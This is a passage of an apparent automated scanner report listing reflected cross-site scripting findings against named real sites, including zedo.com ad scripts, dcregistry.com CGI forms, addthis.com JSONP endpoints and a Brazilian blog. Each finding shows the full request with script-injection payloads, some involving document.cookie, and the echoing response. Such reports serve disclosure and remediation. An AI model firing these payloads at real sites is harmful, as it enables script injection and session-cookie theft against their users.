P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=534
Expires: Wed, 19 Jan 2011 18:09:46 GMT
Date: Wed, 19 Jan 2011 18:00:52 GMT
Connection: close
Content-Length: 2038

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',35817";alert(1)//c76b7e8cf54';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,35817";alert(1)//c76b7e8cf54;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


                           var zzStr = "s=1;u=INmz6woBADYAAHrQ5V4AAACH~010411;z=
...[SNIP]...

4.19. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7468b'%3balert(1)//803ecb61dff was submitted in the $ parameter. This input was echoed as 7468b';alert(1)//803ecb61dff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=&$=7468b'%3balert(1)//803ecb61dff&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1099:7468b';alert(1)//803ecb61dff;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1;expires=Fri, 18 Feb 2011 18:00:53 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=533
Expires: Wed, 19 Jan 2011 18:09:46 GMT
Date: Wed, 19 Jan 2011 18:00:53 GMT
Connection: close
Content-Length: 2038

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',7468b';alert(1)//803ecb61dff';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,7468b';alert(1)//803ecb61dff;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

4.20. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb90e'-alert(1)-'40d04a4f8f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d3/jsc/fmr.js?fb90e'-alert(1)-'40d04a4f8f9=1 HTTP/1.1
Host: d7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; aps=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; FFcat=933,56,15:1099,2,14; ZFFAbh=749B826,20|1483_749#365; FFad=0:0; FFCap=1463B1219,174796:933,196008|0,11,1:0,17,1;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 942
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:933,56,15:1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=249
Expires: Wed, 19 Jan 2011 18:11:59 GMT
Date: Wed, 19 Jan 2011 18:07:50 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/d3;referrer='+document.referrer+';tag=d7.zedo.com/bar/v16-401/d3/jsc/fmr.js;qs=fb90e'-alert(1)-'40d04a4f8f9=1;';

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=;z="+Math.random();}

if(
...[SNIP]...

4.21. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69e4b"%3balert(1)//9f07af1dcbc was submitted in the q parameter. This input was echoed as 69e4b";alert(1)//9f07af1dcbc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=69e4b"%3balert(1)//9f07af1dcbc&$=&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1;expires=Fri, 18 Feb 2011 18:00:49 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=48
Expires: Wed, 19 Jan 2011 18:01:37 GMT
Date: Wed, 19 Jan 2011 18:00:49 GMT
Connection: close
Content-Length: 2035

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='69e4b";alert(1)//9f07af1dcbc';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=69e4b";alert(1)//9f07af1dcbc;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


                           var zzStr = "s=1;u=INmz6woBADYAAHrQ5V4AAACH~010411;z=
...[SNIP]...

4.22. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59624'%3balert(1)//65aac50a934 was submitted in the q parameter. This input was echoed as 59624';alert(1)//65aac50a934 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=59624'%3balert(1)//65aac50a934&$=&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1;expires=Fri, 18 Feb 2011 18:00:50 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=47
Expires: Wed, 19 Jan 2011 18:01:37 GMT
Date: Wed, 19 Jan 2011 18:00:50 GMT
Connection: close
Content-Length: 2035

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='59624';alert(1)//65aac50a934';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=59624';alert(1)//65aac50a934;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

4.23. http://dcregistry.com/cgi-bin/classifieds/classifieds.cgi [db parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcregistry.com
Path:   /cgi-bin/classifieds/classifieds.cgi

Issue detail

The value of the db request parameter is copied into the HTML document as plain text between tags. The payload bc39f<script>alert(1)</script>6e8f0f5d54e was submitted in the db parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/classifieds/classifieds.cgi?db=personalsbc39f<script>alert(1)</script>6e8f0f5d54e HTTP/1.1
Host: dcregistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:21:43 GMT
Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 532

We're sorry, but the script was unable to require /usr/home/dcreg/public_html/www.dcregistry.com/cgi-bin/classifieds/db/personalsbc39f<script>alert(1)</script>6e8f0f5d54e.db at line 215 in classifieds.cgi. Please make sure that these files exist, that you have the path set correctly, and that the permissions are set properly. This message could also indicate that a s
...[SNIP]...

4.24. http://dcregistry.com/cgi-bin/surveys/survey.cgi [db parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcregistry.com
Path:   /cgi-bin/surveys/survey.cgi

Issue detail

The value of the db request parameter is copied into the HTML document as plain text between tags. The payload fe27a<script>alert(1)</script>35aefdde02f was submitted in the db parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/surveys/survey.cgi?db=aad_lookfe27a<script>alert(1)</script>35aefdde02f&website=&language=&display_poll_results=on HTTP/1.1
Host: dcregistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:21:36 GMT
Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 517

We're sorry, but the script was unable to require /usr/home/dcreg/public_html/www.dcregistry.com/cgi-bin/surveys/db/aad_lookfe27a<script>alert(1)</script>35aefdde02f.db at line 206 in survey.cgi. Please make sure that these files exist, that you have the path set correctly, and that the permissions are set properly. This message could also indicate that a syntax
...[SNIP]...

4.25. http://dcregistry.com/cgi-bin/surveys/survey.cgi [language parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcregistry.com
Path:   /cgi-bin/surveys/survey.cgi

Issue detail

The value of the language request parameter is copied into the HTML document as plain text between tags. The payload 5027a<script>alert(1)</script>12f2a4bf5c6 was submitted in the language parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/surveys/survey.cgi?db=aad_look&website=&language=5027a<script>alert(1)</script>12f2a4bf5c6&display_poll_results=on HTTP/1.1
Host: dcregistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:21:41 GMT
Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 531

We're sorry, but the script was unable to require /usr/home/dcreg/public_html/www.dcregistry.com/cgi-bin/surveys/language/5027a<script>alert(1)</script>12f2a4bf5c6/template.pl at line 174 in survey.cgi. Please make sure that these files exist, that you have the path set correctly, and that the permissions are set properly. This message could also indicate that
...[SNIP]...

4.26. http://dcregistry.com/cgi-bin/surveys/survey.cgi [website parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcregistry.com
Path:   /cgi-bin/surveys/survey.cgi

Issue detail

The value of the website request parameter is copied into the HTML document as plain text between tags. The payload 39b59<script>alert(1)</script>d0e2bc9f57e was submitted in the website parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/surveys/survey.cgi?db=aad_look&website=39b59<script>alert(1)</script>d0e2bc9f57e&language=&display_poll_results=on HTTP/1.1
Host: dcregistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:21:40 GMT
Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 515

We're sorry, but the script was unable to require /usr/home/dcreg/public_html/www.dcregistry.com/cgi-bin/surveys/websites/39b59<script>alert(1)</script>d0e2bc9f57e.cfg at line 441 in survey.cgi. Please make sure that these files exist, that you have the path set correctly, and that the permissions are set properly. This message could also indicate that a synta
...[SNIP]...

4.27. http://ds.addthis.com/red/psi/sites/www.csmonitor.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.csmonitor.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 17c72<script>alert(1)</script>aed7ed93f68 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.csmonitor.com/p.json?callback=_ate.ad.hpr17c72<script>alert(1)</script>aed7ed93f68&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.csmonitor.com%2FUSA1edc1%2522-alert(document.cookie)-%25228a5e635d48%2FJustice%2F2011%2F0118%2FSupreme-Court-declines-appeal-of-D.C.-gay-marriage-law&ref=http%3A%2F%2Fburp%2Fshow%2F25&jdg4df HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh30.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; di=%7B%7D..1295378586.60|1293848200.66; dt=X; psc=4; uid=4d1ec56b7612a62c

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 220
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Wed, 19 Jan 2011 18:00:44 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Fri, 18 Feb 2011 18:00:44 GMT; Path=/
Set-Cookie: di=%7B%7D..1295460044.19F|1295378586.60|1293848200.66; Domain=.addthis.com; Expires=Fri, 18-Jan-2013 10:54:33 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Wed, 19 Jan 2011 18:00:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 19 Jan 2011 18:00:44 GMT
Connection: close

_ate.ad.hpr17c72<script>alert(1)</script>aed7ed93f68({"urls":["http://segment-pixel.invitemedia.com/pixel?pixelID=38582&partnerID=169&key=segment"],"segments" : ["19F"],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg=="})

4.28. http://ds.addthis.com/red/psi/sites/www.wileyrein.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.wileyrein.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload b5131<script>alert(1)</script>ac69988ca2e was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.wileyrein.com/p.json?callback=_ate.ad.hprb5131<script>alert(1)</script>ac69988ca2e&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.wileyrein.com%2Fjsfe969%252522%25253e%25253cscript%25253ealert%252528document.cookie%252529%25253c%25252fscript%25253ec77ca9823dd%2Fui.dialog.js&ref=http%3A%2F%2Fburp%2Fshow%2F5&2lh2lm HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh30.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; dt=X; di=%7B%7D..1295378586.60|1293848200.66; psc=4; uid=4d1ec56b7612a62c

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Wed, 19 Jan 2011 18:00:41 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Fri, 18 Feb 2011 18:00:41 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Wed, 19 Jan 2011 18:00:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 19 Jan 2011 18:00:41 GMT
Connection: close

_ate.ad.hprb5131<script>alert(1)</script>ac69988ca2e({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg=="})

4.29. http://financaspessoais.blog.br/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://financaspessoais.blog.br
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8184"><script>alert(1)</script>c42c81b1212 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f8184\"><script>alert(1)</script>c42c81b1212 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?f8184"><script>alert(1)</script>c42c81b1212=1 HTTP/1.1
Host: financaspessoais.blog.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:08:16 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.9
X-Pingback: http://financaspessoais.blog.br/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 207064

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<form action="/?f8184\"><script>alert(1)</script>c42c81b1212=1#wpcf7-f1-p30674-o1" method="post" class="wpcf7-form">
...[SNIP]...

4.30. http://financaspessoais.blog.br/ [utm_campaign parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://financaspessoais.blog.br
Path:   /

Issue detail

The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aff57"><script>alert(1)</script>29569e332da was submitted in the utm_campaign parameter. This input was echoed as aff57\"><script>alert(1)</script>29569e332da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?utm_source=blogger&utm_medium=badge&utm_term=rafael-lima&utm_content=232-58&utm_campaign=blogwatchaff57"><script>alert(1)</script>29569e332da HTTP/1.1
Host: financaspessoais.blog.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:09:50 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.9
X-Pingback: http://financaspessoais.blog.br/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 207160

